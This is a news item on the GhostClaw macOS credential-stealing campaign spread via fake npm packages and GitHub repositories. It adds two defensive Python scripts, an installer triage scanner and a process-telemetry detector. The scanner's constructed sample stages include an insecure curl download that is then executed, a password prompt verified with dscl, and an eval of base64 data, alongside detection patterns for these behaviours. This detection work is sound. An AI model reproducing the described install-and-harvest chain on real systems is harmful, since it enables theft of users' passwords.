Malware & Ransomware · HIGH

GhostClaw - New AI Malware Targets macOS for Credential Theft

Cyber Security News
Tags: GhostClaw, macOS, credential theft, malicious npm packages, GitHub

Basically, GhostClaw is new macOS malware, spread through fake developer tools on npm and GitHub, that tricks users into handing over their passwords.

Quick Summary

GhostClaw malware is targeting macOS developers through malicious npm packages and fake GitHub repositories, stealing credentials via social engineering. Developers must verify source integrity before running any installer.

What Happened

A new malware campaign named GhostClaw has been discovered, specifically targeting macOS users. The campaign uses fake GitHub repositories and AI-assisted development workflows to lure developers. Initially documented by JFrog Security Research in early March 2026, GhostClaw relies on social engineering, with its payloads disguised as legitimate developer tools. The malware is distributed through malicious npm packages, aimed at developers who routinely install tools from public package registries.

GhostClaw's reach has expanded beyond npm to GitHub-hosted repositories that impersonate popular developer utilities. One such repository, TradingView-Claw, had accumulated 386 GitHub stars, a signal of popularity that misled users into trusting its authenticity. When researchers from Jamf Threat Labs investigated, they found at least eight new samples linked to GhostClaw, confirming that its tactics and infrastructure are still evolving.

Who's Being Targeted

GhostClaw primarily targets developers who rely on public repositories and package registries for tools and libraries. By planting malicious code in these trusted ecosystems, attackers reach a broad audience at once. The campaign's dual infection strategy is particularly concerning: the same install instructions that lure a human developer can also be carried out by AI-assisted development tools that run setup steps automatically, so the malware can spread without a person ever reviewing the code.

The implications extend beyond individual developers. By hosting payloads on trusted platforms such as GitHub and npm, attackers can infect many systems from a single malicious package or repository. This is a software supply chain problem: the attackers leverage legitimate distribution channels and social engineering rather than a software vulnerability.

Signs of Infection

The GhostClaw infection process follows a multi-stage execution chain built for credential theft. It begins with a bootstrapper script called install.sh, which masquerades as a standard setup tool. The script checks the macOS version and installs Node.js without requiring elevated privileges, so the victim sees no administrator prompt at this stage. Notably, it runs curl with the --insecure flag, which disables TLS certificate verification; legitimate installers rarely do this.

Once the bootstrapper finishes, the malware executes an obfuscated JavaScript file named setup.js to collect user credentials. The script mimics a legitimate installation, displaying fake progress indicators, and asks for the user's password. It checks the entered password against the local account with the native macOS binary dscl, so the attacker knows the captured password is correct. If the malware lacks Full Disk Access, it shows fake security dialogs to steer the user into granting that permission.
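The two stages above describe concrete, inspectable indicators: a curl download with certificate checks disabled, a password check through dscl, an obfuscated second stage and Full Disk Access nagging. The following is an added example (not code from the original article, and it does not reproduce any GhostClaw sample) of a static triage script that scans a downloaded installer for those indicators before anyone, or any AI coding agent, runs it. The regular expressions, the entropy threshold and the three sample scripts are assumptions constructed for illustration; the `-authonly` form of the dscl check is the standard way dscl validates a password and is assumed here, since the article does not quote the exact command.

```python
"""Static triage of an installer pulled from a GitHub README or npm package.

Added example; not code from the original article and not a reproduction of
any GhostClaw sample. Patterns and thresholds below are assumptions.
"""
import math
import re
from collections import Counter

# (rule name, pattern, meaning). Patterns are assumptions about how the
# indicators appear in a script, not signatures taken from real samples.
RULES = [
    ("curl_insecure",
     re.compile(r"\bcurl\b[^\n|;&]*\s(?:-k|--insecure)\b"),
     "curl invoked with TLS certificate verification disabled"),
    ("dscl_authonly",
     re.compile(r"\bdscl\b[^\n]*-authonly\b"),
     "password checked against Directory Services with dscl -authonly"),
    ("password_prompt",
     re.compile(r"read\s+-s\b|setRawMode|enter (?:your )?password", re.I),
     "script asks the user for a password"),
    ("eval_decode",
     re.compile(r"\b(?:eval|new\s+Function)\s*\([^\n]*(?:atob|base64)"),
     "eval of decoded data, a typical obfuscation loader"),
    ("tcc_nag",
     re.compile(r"Full Disk Access", re.I),
     "script references Full Disk Access"),
]
# English prose sits near 4.0-4.3 bits/char; base64 or packed data is above 5.
ENTROPY_THRESHOLD = 4.5
# String literals of 40+ characters are candidates for a packed payload.
LITERAL = re.compile(r"""(['"])([^'"\n]{40,})\1""")
HIGH_RULES = {"dscl_authonly", "eval_decode", "high_entropy_literal"}


def shannon_entropy(s):
    """Bits per character of the string's byte distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def triage(script):
    """Return the sorted list of rule names that fire on the script text."""
    findings = [name for name, rx, _ in RULES if rx.search(script)]
    if any(shannon_entropy(lit) >= ENTROPY_THRESHOLD for _, lit in LITERAL.findall(script)):
        findings.append("high_entropy_literal")
    return sorted(findings)


def risk_level(findings):
    """Collapse findings into a decision: high = do not run, review = read it first."""
    if HIGH_RULES & set(findings):
        return "high"
    return "review" if findings else "low"


# Constructed sample resembling a bootstrapper; NOT the real install.sh.
INSTALL_SH = r"""#!/bin/bash
set -e
sw_vers -productVersion
mkdir -p "$HOME/.local/tool"
curl -fsSL --insecure https://example.invalid/node.tar.gz -o /tmp/node.tar.gz
tar -xzf /tmp/node.tar.gz -C "$HOME/.local/tool"
exec "$HOME/.local/tool/bin/node" "$HOME/.local/tool/setup.js"
"""

# Constructed sample resembling a second stage; NOT the real setup.js.
SETUP_JS = r"""const { spawnSync } = require('child_process');
process.stdout.write('Installing [####      ] 40%\r');
process.stdout.write('Enter your password to continue: ');
process.stdin.setRawMode(true);
const ok = spawnSync('dscl', ['.', '-authonly', user, pw]).status === 0;
if (!ok) console.log('Grant Full Disk Access to continue');
eval(Buffer.from('x7Kp2QmZ9vLc4RtWbN0JfHyA8sDeGiUo3XlVq1BnCkYr5ThM6PgOwIaEuFjSzd+/', 'base64').toString());
"""

# Constructed benign installer: pinned download, checksum verified, no prompts.
CLEAN_SH = r"""#!/bin/bash
set -e
curl -fsSL https://example.invalid/tool.tar.gz -o /tmp/tool.tar.gz
shasum -a 256 -c tool.tar.gz.sha256
tar -xzf /tmp/tool.tar.gz -C "$HOME/.local"
"""

if __name__ == "__main__":
    for label, text in (("install.sh", INSTALL_SH), ("setup.js", SETUP_JS), ("clean.sh", CLEAN_SH)):
        findings = triage(text)
        print(f"{label}: {risk_level(findings)} {findings}")
```

Run it against a README's install script before executing the script; a `high` verdict means the file does something an installer has no business doing, while `review` (for example, only the insecure curl) means read the whole thing first.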

How to Protect Yourself

To guard against GhostClaw and similar threats, users and developers must be cautious when executing installation commands copied from GitHub repositories or online guides, whether by hand or through an AI coding assistant. Verify the source and read the script before running it: a download that uses curl -k or --insecure, a heavily obfuscated script, or a setup step that asks for your login password should each stop the install. Security teams managing macOS environments should monitor for unusual dscl usage, especially dscl spawned by Node.js or another script interpreter, and for processes that steer users toward the Full Disk Access setting.

Additionally, security tooling that can flag obfuscated scripts and alert on traffic to known command-and-control servers is essential. Educating developers about the risks of unverified repositories and packages reduces the impact of such campaigns.
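The monitoring advice above (unusual dscl usage, processes pushing the user toward Full Disk Access) can be turned into detection logic. Below is an added example, not code from the original article or from any vendor product, that evaluates process-execution telemetry for three behaviours the article describes: dscl password validation spawned under a script interpreter, a script opening the Full Disk Access pane, and curl with certificate checks disabled. The JSON Lines schema (ts, pid, ppid, user, exe, args), the event sample and the rule thresholds are constructed assumptions, not a particular EDR's format; the `x-apple.systempreferences:` deep link to the Full Disk Access pane is a real macOS URL.

```python
"""Host-side detection over process-execution events (JSON Lines).

Added example, not from the original article. Field names and the sample
events are an assumed schema constructed for illustration.
"""
import json
import os

# Interpreters a dropped second stage would run under. Interactive shells are
# deliberately excluded: an admin typing dscl in Terminal also has zsh above it,
# so a shell ancestor alone is not a strong signal.
SCRIPT_HOSTS = {"node", "osascript", "python3", "python"}
# Deep link that opens System Settings directly on the Full Disk Access pane.
FDA_PANE = "x-apple.systempreferences:com.apple.preference.security?Privacy_AllFiles"


def parse_events(jsonl):
    """Parse one JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def ancestry(index, pid):
    """Executable basenames of pid and its ancestors, nearest first."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(os.path.basename(index[pid]["exe"]))
        pid = index[pid]["ppid"]
    return chain


def curl_insecure(args):
    """True if curl skips certificate verification (--insecure, or -k, also
    when bundled into a short-option cluster such as -sSk)."""
    for a in args[1:]:
        if a == "--insecure":
            return True
        if a.startswith("-") and not a.startswith("--") and "k" in a[1:]:
            return True
    return False


def evaluate(events):
    """Return one alert dict per event that matches a rule."""
    index = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = os.path.basename(e["exe"])
        args = e["args"]
        parents = ancestry(index, e["ppid"])
        from_script = any(p in SCRIPT_HOSTS for p in parents)
        rule = severity = None
        if name == "dscl" and "-authonly" in args:
            # Password validation; high when a script interpreter is in the chain.
            rule, severity = "dscl_authonly", ("high" if from_script else "medium")
        elif name == "open" and from_script and any(a.startswith(FDA_PANE) for a in args):
            rule, severity = "fda_pane_from_script", "high"
        elif name == "curl" and curl_insecure(args):
            rule, severity = "curl_insecure", "medium"
        if rule:
            alerts.append({"pid": e["pid"], "rule": rule, "severity": severity,
                           "user": e["user"], "chain": " <- ".join([name] + parents)})
    return alerts


# Constructed telemetry: a Terminal session runs a bootstrapper that fetches
# Node.js insecurely, then a node script validates a password with dscl and
# opens the Full Disk Access pane. Two benign events (601, 602) must not fire.
SAMPLE_EVENTS = """\
{"ts":"2026-03-10T14:02:01Z","pid":500,"ppid":1,"user":"alice","exe":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","args":["Terminal"]}
{"ts":"2026-03-10T14:02:02Z","pid":501,"ppid":500,"user":"alice","exe":"/bin/zsh","args":["-zsh"]}
{"ts":"2026-03-10T14:05:10Z","pid":502,"ppid":501,"user":"alice","exe":"/bin/bash","args":["bash","install.sh"]}
{"ts":"2026-03-10T14:05:11Z","pid":503,"ppid":502,"user":"alice","exe":"/usr/bin/curl","args":["curl","-fsSL","--insecure","https://example.invalid/node.tar.gz","-o","/tmp/node.tar.gz"]}
{"ts":"2026-03-10T14:05:20Z","pid":504,"ppid":502,"user":"alice","exe":"/Users/alice/.local/tool/bin/node","args":["node","setup.js"]}
{"ts":"2026-03-10T14:05:41Z","pid":505,"ppid":504,"user":"alice","exe":"/usr/bin/dscl","args":["dscl",".","-authonly","alice","<redacted>"]}
{"ts":"2026-03-10T14:05:42Z","pid":506,"ppid":504,"user":"alice","exe":"/usr/bin/open","args":["open","x-apple.systempreferences:com.apple.preference.security?Privacy_AllFiles"]}
{"ts":"2026-03-10T14:09:00Z","pid":601,"ppid":501,"user":"alice","exe":"/usr/bin/dscl","args":["dscl",".","-read","/Users/alice","UniqueID"]}
{"ts":"2026-03-10T14:09:05Z","pid":602,"ppid":501,"user":"alice","exe":"/usr/bin/curl","args":["curl","-fsSL","https://example.invalid/tool.tar.gz"]}
"""

if __name__ == "__main__":
    for alert in evaluate(parse_events(SAMPLE_EVENTS)):
        print(f"[{alert['severity']}] pid {alert['pid']} {alert['rule']}: {alert['chain']}")
```

The process chain is the part worth keeping in the alert: `dscl <- node <- bash <- zsh <- Terminal` tells the responder that a just-installed script, not an administrator, asked Directory Services to validate a password, and the adjacent `open` of the Full Disk Access pane from the same node parent is the second half of the pattern the article describes.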

🔒 Pro insight: GhostClaw's use of AI-assisted tools for infection reflects a dangerous evolution in malware distribution tactics, warranting heightened vigilance among developers.

Original article from Cyber Security News · Tushar Subhra Dutta


Related Pings

HIGH · Malware & Ransomware

Infiniti Stealer - New macOS Infostealer Emerges

A new macOS malware called Infiniti Stealer tricks users into executing malicious commands. This poses serious risks to sensitive data on Macs. Stay safe by avoiding suspicious commands.

Malwarebytes Labs
HIGH · Malware & Ransomware

Malware Alert - Elastic Security Labs Uncovers BRUSHWORM

Elastic Security Labs has discovered two new malware types, BRUSHWORM and BRUSHLOGGER, targeting a South Asian financial institution. These threats use USB drives to spread and steal sensitive data. Organizations must act swiftly to mitigate risks and protect their data.

Elastic Security Labs
HIGH · Malware & Ransomware

Malware Discovered in LiteLLM - Major Security Breach Alert

LiteLLM, a popular AI tool, was infected by malware that stole user credentials. Millions of users are at risk, raising serious security concerns. The developers are actively investigating the breach and working on solutions.

TechCrunch Security
HIGH · Malware & Ransomware

Malware - US Imprisons Russian Botnet Operator for Ransomware

Ilya Angelov, a Russian botnet operator, has been sentenced for his role in ransomware attacks against US companies. This case underscores the ongoing threat of cybercrime. With millions lost to extortion, vigilance is essential for organizations to protect themselves.

SC Media
HIGH · Malware & Ransomware

Malware Attack - Puerto Rico's Driver's License Agency Disrupted

A ransomware attack has disrupted Puerto Rico’s driver's license agency. All services are halted, affecting many residents. Officials are working to ensure data integrity before resuming operations.

SC Media
HIGH · Malware & Ransomware

Malware - Armenian Extradited for RedLine Infostealer Role

An Armenian man has been extradited to the U.S. for his role in the RedLine infostealer scheme. This malware has targeted major corporations, raising significant security concerns. The case underscores the ongoing battle against cybercrime and the need for robust cybersecurity measures.

SC Media